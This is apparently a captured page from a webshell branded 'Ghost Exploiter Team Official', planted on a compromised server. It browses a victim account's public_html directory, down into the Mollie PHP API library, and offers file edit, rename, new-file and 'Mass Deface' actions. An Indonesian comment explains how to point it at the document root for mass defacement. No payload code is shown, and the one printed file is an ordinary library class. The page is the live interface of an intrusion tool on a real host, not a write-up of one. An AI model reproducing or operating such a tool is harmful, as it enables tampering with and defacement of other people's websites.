webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
src
/
Idempotency
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DefaultIdempotencyKeyGe
...
1.153KB
edt
ren
FakeIdempotencyKeyGener
...
0.35KB
edt
ren
IdempotencyKeyGenerator
...
0.116KB
edt
ren
<?php declare(strict_types=1); namespace Mollie\Api\Idempotency; class FakeIdempotencyKeyGenerator implements IdempotencyKeyGeneratorContract { /** @var string */ private $fakeKey; public function setFakeKey($fakeKey) { $this->fakeKey = $fakeKey; } public function generate() { return $this->fakeKey; } }
<=Back
Liking